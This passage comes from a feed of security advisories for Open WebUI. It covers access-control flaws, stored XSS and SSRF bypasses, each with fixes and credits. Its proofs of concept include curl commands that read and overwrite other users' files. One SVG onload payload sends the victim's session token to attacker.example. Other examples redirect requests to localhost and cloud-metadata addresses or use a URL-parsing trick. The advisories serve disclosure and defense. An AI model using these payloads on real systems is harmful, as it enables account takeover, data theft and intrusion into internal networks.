(OpenAI/Azure/etc), an attacker can generate unlimited requests and incur charges.\n\n## Resolution\n\nFixed in commit [e5035ea31](https://github.com/open-webui/open-webui/commit/e5035ea31e179977e805a7032c979ff59a71860a), first released in **v0.8.0** (Feb 2026). The `/api/v1/memories/ef` route was removed entirely. It was a diagnostic/debug-style endpoint that hard-coded `\"hello world\"` through the embedding function without any authentication dependency; there was no legitimate caller that depended on it, so deletion was the cleaner fix than retrofitting auth. Users on `\u003e= 0.8.0` are not affected.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:28:02.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-m69w-p7m4-585j","https://github.com/open-webui/open-webui/commit/e5035ea31e179977e805a7032c979ff59a71860a","https://github.com/open-webui/open-webui/releases/tag/v0.8.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45667","https://github.com/advisories/GHSA-m69w-p7m4-585j"],"source_kind":"github","identifiers":["GHSA-m69w-p7m4-585j","CVE-2026-45667"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.085Z","epss_percentage":0.00341,"epss_percentile":0.26579,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNjl3LXA3bTQtNTg1as4ABW5L","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tNjl3LXA3bTQtNTg1as4ABW5L","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.0","vulnerable_version_range":"\u003c= 0.7.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNjl3LXA3bTQtNTg1as4ABW5L/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14M3FtLXA4aHItM2MzaM4ABW5K","url":"https://github.com/advisories/GHSA-x3qm-p8hr-3c3h","title":"Open WebUI has an Indirect Object Reference (IDOR) in user notes","description":"### Summary\nThe  API /api/v1/notes/{note_id} endpoint lacks proper authorization checks, allowing authenticated users to retrieve notes belonging to other users by guessing or enumerating UUIDs. This results in unauthorized disclosure of potentially sensitive or private user data.\n\n### Details\n- if notes is enabled from UI (Settings \u003e\u003e General \u003e\u003e Features \u003e\u003e Notes (Beta))\n   - From API, attacker can access other user notes\n- if notes is disabled from UI (Settings \u003e\u003e General \u003e\u003e Features \u003e\u003e Notes (Beta))\n   - Then attacker can enable the notes from /api/config and access other user notes \n\n### PoC\n- Step 1: Log in to the application as a valid user (User A).\n![image](https://github.com/user-attachments/assets/3c4625f9-6e51-4cd1-942e-6a3f467520c0)\n\n- Step 2: Intercept or inspect the response from the endpoint GET /api/config.\n![image](https://github.com/user-attachments/assets/7c4fe716-314c-4640-bc9f-1e11ddc2273d)\n\n- Step 3: Observe the field \"enable_notes\": false in the JSON response.\n- Step 4: Manually change \"enable_notes\" to true using browser DevTools or by intercepting and modifying the response via a proxy like Burp Suite. (Please note, the occurrence of this API comes twice, hence modification needs to be made twice as well.)\n![image](https://github.com/user-attachments/assets/99575570-a673-4508-b149-9a2480d8f62e)\n\n- Step 5: Observe the loaded frontend application; the previously hidden notes form will now be visible.\n![image](https://github.com/user-attachments/assets/a4059b1f-2e77-4f29-88a3-431e82b7c41d)\n\n![image](https://github.com/user-attachments/assets/55e601d7-b013-43e3-a070-3a80f166e777)\n\n- Step 6: Again, click on any note, intercept the request, and Replace the note_id in the URL with a different note ID known to belong to another user (e.g., by guessing or bruteforcing).\n- Step 7: Send the modified request while remaining logged in as User A.\n- Step 8: Observe that the server returns the content of another user's note, confirming unauthorized access.\n![image](https://github.com/user-attachments/assets/cbec4ab5-a8a8-488a-a984-03e8de5b22f7)\n![image](https://github.com/user-attachments/assets/046cd925-7299-44ba-bfc3-d6e7071d29d1)\n\n\n### Impact\n1. Unauthorized access to user-created notes\n2. Possible exposure of confidential or sensitive uploaded data\n3. Violation of user privacy and data isolation\n4. High risk of legal or compliance breaches in regulated environments\n\n## Resolution\n\nFixed in commit [de3317e26](https://github.com/open-webui/open-webui/commit/de3317e26bb67a2a7ea015a183bbd1d369880ebd), first released in **v0.8.11** (Mar 2026). All per-id note endpoints (`GET /api/v1/notes/{id}`, `POST /api/v1/notes/{id}/update`, `POST /api/v1/notes/{id}/access/update`, deletion) now enforce ownership: the handler fetches the note, then requires the caller to be admin, the note owner, or have an `AccessGrants` grant for the appropriate permission (`read` for retrieval, `write` for mutation). A non-owner with no grant receives 403.\n\nUsers on `\u003e= 0.8.11` are not affected.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:27:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-x3qm-p8hr-3c3h","https://github.com/open-webui/open-webui/commit/de3317e26bb67a2a7ea015a183bbd1d369880ebd","https://github.com/open-webui/open-webui/releases/tag/v0.8.11","https://nvd.nist.gov/vuln/detail/CVE-2026-45666","https://github.com/advisories/GHSA-x3qm-p8hr-3c3h"],"source_kind":"github","identifiers":["GHSA-x3qm-p8hr-3c3h","CVE-2026-45666"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.085Z","epss_percentage":0.00277,"epss_percentile":0.1955,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14M3FtLXA4aHItM2MzaM4ABW5K","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14M3FtLXA4aHItM2MzaM4ABW5K","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.11","vulnerable_version_range":"\u003c= 0.8.10"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14M3FtLXA4aHItM2MzaM4ABW5K/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yNDcyLW13N20tOTY3Zs4ABW5I","url":"https://github.com/advisories/GHSA-r472-mw7m-967f","title":"Open WebUI: Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints","description":"# Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints\n\n## Summary\n\nMultiple endpoints accept a user-supplied `file_id` and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID.\n\n## Affected code paths\n\n### Path 1 — Folder knowledge ingestion via `folders.update`\n\n`backend/open_webui/routers/folders.py:156` — `POST /api/v1/folders/{id}/update` accepts a `FolderUpdateForm` whose `data: Optional[dict]` field is written verbatim into the folder. The folder consumer at `backend/open_webui/utils/middleware.py:2409` spreads `folder.data['files']` directly into `form_data['files']` for the next chat completion, which becomes RAG context. There is no per-file ownership check at the writer (the update handler) and no per-file ownership check at the reader (the middleware folder consumer) — only the *folder list* endpoint (`folders.py:78-94`) cleans up by stripping inaccessible files, and that runs lazily at folder-list time rather than at chat time. An attacker with a victim's file UUID can write `data: {\"files\": [{\"id\": \"\u003cvictim\u003e\", \"type\": \"file\"}]}` into their own folder, immediately chat in that folder, and have the LLM return the victim's document content via RAG. The cleanup pass strips the file from persistence later, but the exfiltration has already happened.\n\n### Path 2 — Knowledge-base attach via `knowledge.{id}/file/add` and `knowledge.{id}/files/batch/add`\n\n`backend/open_webui/routers/knowledge.py:616-669` (`add_file_to_knowledge_by_id`) and `backend/open_webui/routers/knowledge.py:972-1035` (`add_files_to_knowledge_by_id_batch`) check the caller's *write access to the knowledge base* but never validate the caller's access to the `file_id` being attached. Because `has_access_to_file(..., user)` returns True for any file linked to a KB the caller owns, attaching a victim's `file_id` to an attacker-owned KB silently unlocks read **and** write on that file through `/api/v1/files/{id}/content` and `/api/v1/files/{id}/data/content/update`. This is a stronger variant than Path 1 — full read AND overwrite, persisted, no cleanup pass to mitigate.\n\n## Proof of concept\n\n### Path 1 (folder knowledge)\n```bash\n# Attacker writes victim file_id into their own folder\ncurl -X POST http://target/api/v1/folders/\u003cattacker_folder_id\u003e/update \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d \"{\\\"data\\\": {\\\"files\\\": [{\\\"id\\\": \\\"$VICTIM_FILE_ID\\\", \\\"type\\\": \\\"file\\\"}]}}\"\n\n# Attacker chats in that folder — victim file becomes RAG context\ncurl -X POST http://target/api/chat/completions \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d \"{\\\"model\\\":\\\"any\\\",\\\"messages\\\":[{\\\"role\\\":\\\"user\\\",\\\"content\\\":\\\"summarise my uploaded document\\\"}],\\\"folder_id\\\":\\\"\u003cattacker_folder_id\u003e\\\"}\"\n```\n  \n### Path 2 (knowledge-base attach)\n\n```\n# Attacker creates own KB\nKB=$(curl -s -X POST http://target/api/v1/knowledge/create \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d '{\"name\":\"x\",\"description\":\"x\",\"data\":{}}' | jq -r .id)\n\n# Attach victim's file_id — no ownership check\ncurl -X POST http://target/api/v1/knowledge/$KB/file/add \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d \"{\\\"file_id\\\":\\\"$VICTIM_FILE_ID\\\"}\"\n\n# Read victim file through standard files endpoint (now accessible because file is \"linked to KB I own\")\ncurl http://target/api/v1/files/$VICTIM_FILE_ID/content -H \"Authorization: Bearer $ATK\"\n\n# Overwrite\ncurl -X POST http://target/api/v1/files/$VICTIM_FILE_ID/data/content/update \\\n  -H \"Authorization: Bearer $ATK\" -H \"Content-Type: application/json\" \\\n  -d '{\"content\":\"tampered\"}'\n```\n\n## Impact\n\n- Confidentiality: Any authenticated user can read the contents of any other user's private uploaded file, given knowledge of the file UUID. UUIDs are V4 (not enumerable in practice) but leak through normal usage — file IDs appear in chat sources, in shared chats' citations, in URL paths (/workspace/files/\u003cid\u003e), in browser history / referrer headers, and in any export/share flow that surfaces source metadata.\n- Integrity: Path 2 (knowledge attach) additionally allows the attacker to overwrite the victim's file content, persisting attacker-controlled text under the victim's file_id. Subsequent reads by the victim or by any RAG flow that ingests the victim's file return the tampered content.\n- Availability: None directly — file rows are not deleted by these paths.\n\n## Recommended fix\n\nValidate the supplied file_id against the caller's read access before attaching, in every writer.\n\n### Credits\n\nPer the consolidation rule in SECURITY.md, credit goes only to reporters who FIRST identified a distinct sub-path that no earlier filing covered.\n\nMrBeard-FT — first to identify the folder-knowledge ingestion path (Path 1)\nClassic298 — first to identify the knowledge-base attach path (Path 2 — /knowledge/{id}/file/add and /files/batch/add)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:27:35.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://nvd.nist.gov/vuln/detail/CVE-2026-45402","https://github.com/advisories/GHSA-r472-mw7m-967f"],"source_kind":"github","identifiers":["GHSA-r472-mw7m-967f","CVE-2026-45402"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.086Z","epss_percentage":0.00346,"epss_percentile":0.27148,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yNDcyLW13N20tOTY3Zs4ABW5I","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yNDcyLW13N20tOTY3Zs4ABW5I","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c= 0.9.4"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yNDcyLW13N20tOTY3Zs4ABW5I/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zd2dqLWMyaGctdm02cc4ABW5H","url":"https://github.com/advisories/GHSA-3wgj-c2hg-vm6q","title":"Open WebUI vulnerable to stored XSS via OAuth picture claim stored as SVG data URI in profile_image_url","description":"# Summary\n\nWhen a user signs in via OAuth, Open WebUI fetches the `picture` claim URL, infers a MIME type from the URL extension via `mimetypes.guess_type`, and stores `data:\u003cmime\u003e;base64,...` as the user's profile image. The OAuth code path does not go through the `validate_profile_image_url` Pydantic validator that normally restricts profile images to PNG/JPEG/GIF/WebP. A `.svg` URL in the `picture` claim lands in the database as `data:image/svg+xml;base64,...`.\n\nThe profile image endpoint `GET /api/v1/users/{id}/profile/image` returns the stored data URI with the attacker-controlled MIME type as `Content-Type` and `Content-Disposition: inline`. Security headers (CSP, `X-Content-Type-Options`) are env-gated and not set by default. An authenticated user navigating directly to that URL gets the SVG as a top-level document, executing `\u003cscript\u003e`/`onload` in the same origin and able to read `localStorage.token` → account takeover.\n\nSame class of trust-boundary error as CVE-2025-64496 (trust of untrusted model servers) and CVE-2025-64495 (rich-text XSS). Different sink, different code path.\n\n# Details\n\n## 1. MIME inferred from URL extension, not Content-Type\n\n`backend/open_webui/utils/oauth.py:1336-1345` — `_process_picture_url`:\n\n```python\nresponse = await client.get(picture_url, ...)\nif response.status_code == 200:\n    picture = response.content\n    base64_encoded_picture = base64.b64encode(picture).decode(\"utf-8\")\n    guessed_mime_type = mimetypes.guess_type(picture_url)[0]\n    if guessed_mime_type is None:\n        guessed_mime_type = \"image/jpeg\"\n    return f\"data:{guessed_mime_type};base64,{base64_encoded_picture}\"\n```\n\nNo MIME allowlist. The upstream `Content-Type` is ignored. For a URL ending in `.svg`, `mimetypes.guess_type` returns `image/svg+xml`.\n\n## 2. OAuth path bypasses the profile-image validator\n\n`backend/open_webui/utils/validate.py:10-36` defines `validate_profile_image_url`, which only accepts `/user.png`, `/user-mono.png`, and `data:image/{png,jpeg,gif,webp};base64,...`.\n\nThis validator is wired into Pydantic form models (`SignupForm`, `UpdateProfileForm`, `UserUpdateForm`), but the OAuth flow at `oauth.py:1536-1540` (existing-user login) and `oauth.py:1556-1574` (new-user signup) writes via `Users.update_user_profile_image_url_by_id` and `Auths.insert_new_auth`, both of which call SQLAlchemy directly (`models/users.py:575-588`) without going through any Pydantic model. The SVG data URI lands in the DB unchallenged.\n\n## 3. Endpoint serves attacker-controlled MIME with `inline` disposition\n\n`backend/open_webui/routers/users.py:504-528` — `get_user_profile_image_by_id`:\n\n```python\nheader, encoded = image.split(\",\", 1)\nmedia_type = header.split(\";\")[0].lstrip(\"data:\")  # \"image/svg+xml\"\ndata = base64.b64decode(encoded)\nreturn StreamingResponse(\n    iter([data]),\n    media_type=media_type,\n    headers={\"Content-Disposition\": \"inline\"},\n)\n```\n\nNo MIME whitelist. The route requires `get_verified_user` — any authenticated user reaches it.\n\n## 4. No default CSP / nosniff\n\n`backend/open_webui/utils/security_headers.py:16-61` populates headers only when the operator sets the corresponding env var. The default deployment returns none of these. Browsers render a top-level `image/svg+xml` response as an XML document and execute embedded script.\n\n# PoC\n\n**Prerequisites**: operator has OAuth signup enabled (`ENABLE_OAUTH_SIGNUP=true`) or OAuth login with picture sync (`OAUTH_UPDATE_PICTURE_ON_LOGIN=true`). The attacker has a valid identity on the configured IdP and can set their profile picture URL.\n\n1. Attacker hosts a malicious SVG at `https://attacker.example/p.svg`:\n\n```xml\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\n     onload=\"fetch('https://attacker.example/x?c='+encodeURIComponent(localStorage.getItem('token')))\" /\u003e\n```\n\n2. Attacker sets their IdP profile picture to that URL and signs in to Open WebUI via OAuth. Signup (or login with picture sync) stores `data:image/svg+xml;base64,...` in the attacker's `profile_image_url`.\n\n3. Attacker shares a link to their own profile image with a victim in a chat DM or channel:\n\n```\nhttps://target.example/api/v1/users/\u003cattacker-user-id\u003e/profile/image\n```\n\n4. The authenticated victim clicks the link. The browser receives `Content-Type: image/svg+xml` with `Content-Disposition: inline`, renders the SVG as a top-level document, fires `onload`, and exfiltrates the victim's JWT. Attacker uses the JWT to take over the victim's account.\n\n# Impact\n\n- Account takeover of any authenticated user who opens the crafted URL.\n- Post-takeover: access to the victim's chats, API keys stored in their settings, and — if the victim has `workspace.tools` permission — RCE via installed tools (per CVE-2025-64496 analysis).\n- The same `_process_picture_url` function has no SSRF allowlist; a secondary primitive is to point the `picture` claim at an internal URL (metadata service, internal admin panel) and read the response bytes via the profile image endpoint.\n\n# Suggested fix\n\n1. In `_process_picture_url` (`utils/oauth.py:1336-1345`): reject any MIME outside `{image/png, image/jpeg, image/gif, image/webp}`. Use the upstream `Content-Type` response header, not the URL extension. Also add an SSRF allowlist or at minimum block RFC1918 / link-local / loopback targets.\n\n2. In `get_user_profile_image_by_id` (`routers/users.py:504-528`): enforce a MIME whitelist before building `StreamingResponse`. This is the defense-in-depth layer that should have caught the bypass.\n\n3. Apply `validate_profile_image_url` at the model/storage layer (`Users.update_user_profile_image_url_by_id`), not only at the Pydantic form layer. All write paths to the profile image column should go through the same validator.\n\n4. Set `X-Content-Type-Options: nosniff` and a default CSP unless the operator explicitly disables them.\n\n# References\n\n- `backend/open_webui/utils/oauth.py:1318-1351` — MIME guess + fetch\n- `backend/open_webui/utils/oauth.py:1536-1574` — OAuth write path\n- `backend/open_webui/utils/validate.py:10-36` — validator (bypassed)\n- `backend/open_webui/models/users.py:575-588` — DB write\n- `backend/open_webui/routers/users.py:504-528` — serving endpoint\n- `backend/open_webui/utils/security_headers.py:16-61` — env-gated headers\n- CVE-2025-64496 — precedent: trust boundary error (same class)\n- CVE-2025-64495 — precedent: rich-text XSS (same class)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:27:28.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-3wgj-c2hg-vm6q","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://github.com/advisories/GHSA-3wgj-c2hg-vm6q"],"source_kind":"github","identifiers":["GHSA-3wgj-c2hg-vm6q"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.086Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zd2dqLWMyaGctdm02cc4ABW5H","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zd2dqLWMyaGctdm02cc4ABW5H","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c= 0.9.4"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zd2dqLWMyaGctdm02cc4ABW5H/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yaDV4LWg2cHAtY2pqNs4ABW5G","url":"https://github.com/advisories/GHSA-rh5x-h6pp-cjj6","title":"Open WebUI has a SSRF Bypass via HTTP Redirect Following in Web-Fetch and Image-Load Endpoints (not addressed by CVE-2025-65958)","description":"# Server-Side Request Forgery (SSRF) Bypass via HTTP Redirect Following in Web-Fetch, Image-Load, and Chat-Completion Endpoints\n\n## Summary\n\nThe `validate_url()` function in `backend/open_webui/retrieval/web/utils.py` only validates the *initial* URL submitted by the caller. The HTTP clients used downstream (sync `requests`, async `aiohttp`, langchain's `WebBaseLoader`) follow HTTP 3xx redirects by default and do **not** re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. `127.0.0.1`, `169.254.169.254`, RFC1918) and read the internal response body via the `/api/v1/retrieval/process/web` endpoint, the `/api/v1/images/...` endpoints, the `/api/chat/completions` endpoint with an `image_url` content part, and any other route that calls these helpers.\n\n## Affected code paths\n\nThe bypass exists across multiple call sites; each independently follows redirects without re-validation.\n\n### Path 1 — sync `_scrape` via `SafeWebBaseLoader`\n\n`backend/open_webui/retrieval/web/utils.py` — `SafeWebBaseLoader` inherits from `langchain_community.document_loaders.WebBaseLoader`. The parent's `_scrape()` calls `self.session.get(url, **self.requests_kwargs)`. `requests_kwargs` only sets `timeout`; `allow_redirects=False` is **not** passed, so `requests.Session.get()` follows redirects with the default `allow_redirects=True`. `validate_url()` is invoked once on the original URL only.\n\n### Path 2 — async `_fetch` (aiohttp)\n\n`backend/open_webui/retrieval/web/utils.py` — `_fetch()` previously inherited the aiohttp default `allow_redirects=True`. As of HEAD this path is fixed (`allow_redirects=False`). Listed for completeness.\n\n### Path 3 — `get_content_from_url` (sync `requests.get`)\n\n`backend/open_webui/retrieval/utils.py` — `response = requests.get(url, stream=True, timeout=30)`. No `allow_redirects=False`. Reached via `/api/v1/retrieval/process/web` (file ingestion) and other routers that resolve external URLs.\n\n### Path 4 — `load_url_image` (image edit)\n\n`backend/open_webui/routers/images.py` — image-URL fetching helper used by the image-edit endpoint. Same pattern: `validate_url()` checks only the initial URL, the underlying HTTP client follows redirects without re-validation. Reachable via `/api/v1/images/edit`.\n\n### Path 5 — `get_image_base64_from_url` (chat-completion image inlining)\n\n`backend/open_webui/utils/files.py` — `get_image_base64_from_url()` is invoked from `convert_url_images_to_base64()` in `backend/open_webui/utils/middleware.py` on every `/api/chat/completions` request whose message content includes an `image_url` part. The shared aiohttp session pool (`backend/open_webui/utils/session_pool.py`) does not override the aiohttp default `allow_redirects=True`, and the call site itself does not pass `allow_redirects=False`. This is the most reachable variant in the cluster: no special endpoint, no admin permission, no feature flag — any authenticated user can trigger it from a normal chat message.\n\n## Proof of concept\n\nAuthenticated low-privilege user; default config, no admin or special permissions required.\n\n```bash\ncurl -X POST https://\u003ctarget\u003e/api/v1/retrieval/process/web \\\n  -H \"Authorization: Bearer \u003cany_user_token\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"url\": \"https://httpbin.org/redirect-to?url=http%3A%2F%2Flocalhost%3A8080%2Fapi%2Fconfig\u0026status_code=302\"}'\n```\n\nResponse body contains the internal `/api/config` payload in `file.data.content`. Replace the redirect target with `http://169.254.169.254/latest/meta-data/` for cloud metadata, or any internal hostname reachable from the server.\n\nFor the chat-completion path (Path 5), the same redirect is followed when an `image_url` content part points to an attacker-controlled redirector:\n\n```bash\ncurl -X POST https://\u003ctarget\u003e/api/chat/completions \\\n  -H \"Authorization: Bearer \u003cany_user_token\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"model\":\"any\",\"messages\":[{\"role\":\"user\",\"content\":[{\"type\":\"text\",\"text\":\"x\"},{\"type\":\"image_url\",\"image_url\":{\"url\":\"http://attacker/redirect-to-imdsv1\"}}]}]}'\n```\n\n## Impact\n\nAny authenticated user can read GET responses from any HTTP service reachable by the Open WebUI server process — cloud metadata services (IMDSv1 if available), localhost-bound application APIs, internal databases / monitoring / Kubernetes services, and VPN-bridged on-premise networks.\n\n## Recommended fix\n\nFor every call site that follows redirects, set `allow_redirects=False` on the underlying HTTP client and add a per-hop validation loop using `validate_url()` on each `Location:` header.\n\n## Credits\n\nPer the consolidation rule in SECURITY.md, credit goes only to reporters who FIRST identified a distinct sub-path that no earlier filing covered.\n\n- **tenbbughunters** — first to identify SafeWebBaseLoader sync `_scrape` (Path 1)\n- **YLChen-007** — first to identify `load_url_image` (Path 4)\n- **tempcollab** — first to identify aiohttp `_fetch` (Path 2)\n- **sneaXOR** — first to identify `get_content_from_url` (Path 3)\n- **nayakchinmohan** — first to identify `get_image_base64_from_url` in chat-completion middleware (Path 5)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:27:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-rh5x-h6pp-cjj6","https://github.com/advisories/GHSA-c6xv-rcvw-v685","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://nvd.nist.gov/vuln/detail/CVE-2026-45401","https://github.com/advisories/GHSA-rh5x-h6pp-cjj6"],"source_kind":"github","identifiers":["GHSA-rh5x-h6pp-cjj6","CVE-2026-45401"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.087Z","epss_percentage":0.003,"epss_percentile":0.21995,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yaDV4LWg2cHAtY2pqNs4ABW5G","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yaDV4LWg2cHAtY2pqNs4ABW5G","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c= 0.9.4"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yaDV4LWg2cHAtY2pqNs4ABW5G/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04dzdxLXE1anAtanZneM4ABW5F","url":"https://github.com/advisories/GHSA-8w7q-q5jp-jvgx","title":"Open WebUI has a Server-Side Request Forgery (SSRF) bypass in `validate_url`","description":"### Summary\nIn the open-webui project, a parsing difference between the urlparse and requests libraries led to an SSRF bypass vulnerability.\n\n### Details\nIn the current project, URL validation is performed using the function validate_url.\n\n\u003cimg width=\"1323\" height=\"1145\" alt=\"QQ20260322-202854-22-1\" src=\"https://github.com/user-attachments/assets/896d19f2-c7c3-499a-9052-12aea756ac47\" /\u003e\n\nThe current checking logic uses urlparse to parse the hostname part of the URL for verification.\n\n\u003cimg width=\"1122\" height=\"429\" alt=\"QQ20260322-203014-22-2\" src=\"https://github.com/user-attachments/assets/653520e9-e311-4a5e-8345-a2446e217d88\" /\u003e\n\nHowever, there are actually differences in parsing between urlparse and the library that actually sends the request. For example, in files.py, validate_url is used first for URL validation, and then requests.get is used to send the request.\n\n\u003cimg width=\"1269\" height=\"915\" alt=\"QQ20260322-203122-22-3\" src=\"https://github.com/user-attachments/assets/f200aa06-9190-425e-9659-1ecaf95f806b\" /\u003e\n\nThe core issue: `urlparse()` and `requests` disagree on which host a URL like `http://127.0.0.1:6666\\@1.1.1.1` points to:\n\n- `urlparse()` treats `\\` as a regular character and `@` as the userinfo-host delimiter, so it extracts hostname as `1.1.1.1` (public)\n- `requests` treats `\\` as a path character, connecting to `127.0.0.1` (internal)\n\nBelow is a test code I wrote following the open-webui code.\n```\nfrom __future__ import annotations\n\nimport ipaddress\nimport logging\nimport os\nimport socket\nimport urllib.parse\nimport urllib.request\nfrom typing import Optional, Sequence, Union\nimport requests\n\nlog = logging.getLogger(__name__)\n\n# Same text as open_webui.constants.ERROR_MESSAGES.INVALID_URL\nINVALID_URL = (\n    \"Oops! The URL you provided is invalid. Please double-check and try again.\"\n)\n\n# Same semantics as open_webui.config (ENABLE_RAG_LOCAL_WEB_FETCH / WEB_FETCH_FILTER_LIST)\nENABLE_RAG_LOCAL_WEB_FETCH = (\n    os.getenv(\"ENABLE_RAG_LOCAL_WEB_FETCH\", \"False\").lower() == \"true\"\n)\n\n_DEFAULT_WEB_FETCH_FILTER_LIST = [\n    \"!169.254.169.254\",\n    \"!fd00:ec2::254\",\n    \"!metadata.google.internal\",\n    \"!metadata.azure.com\",\n    \"!100.100.100.200\",\n]\n_web_fetch_filter_env = os.getenv(\"WEB_FETCH_FILTER_LIST\", \"\")\nif _web_fetch_filter_env == \"\":\n    _web_fetch_filter_env_list: list[str] = []\nelse:\n    _web_fetch_filter_env_list = [\n        item.strip()\n        for item in _web_fetch_filter_env.split(\",\")\n        if item.strip()\n    ]\nWEB_FETCH_FILTER_LIST = list(\n    set(_DEFAULT_WEB_FETCH_FILTER_LIST + _web_fetch_filter_env_list)\n)\n\n\ndef get_allow_block_lists(filter_list):\n    allow_list = []\n    block_list = []\n\n    if filter_list:\n        for d in filter_list:\n            if d.startswith(\"!\"):\n                block_list.append(d[1:].strip())\n            else:\n                allow_list.append(d.strip())\n\n    return allow_list, block_list\n\n\ndef is_string_allowed(\n    string: Union[str, Sequence[str]], filter_list: Optional[list[str]] = None\n) -\u003e bool:\n    if not filter_list:\n        return True\n\n    allow_list, block_list = get_allow_block_lists(filter_list)\n    strings = [string] if isinstance(string, str) else list(string)\n\n    if allow_list:\n        if not any(s.endswith(allowed) for s in strings for allowed in allow_list):\n            return False\n\n    if any(s.endswith(blocked) for s in strings for blocked in block_list):\n        return False\n\n    return True\n\n\ndef resolve_hostname(hostname):\n    # Get address information\n    addr_info = socket.getaddrinfo(hostname, None)\n\n    # Extract IP addresses from address information\n    ipv4_addresses = [info[4][0] for info in addr_info if info[0] == socket.AF_INET]\n    ipv6_addresses = [info[4][0] for info in addr_info if info[0] == socket.AF_INET6]\n\n    return ipv4_addresses, ipv6_addresses\n\n\ndef _validators_url_accept(url: str) 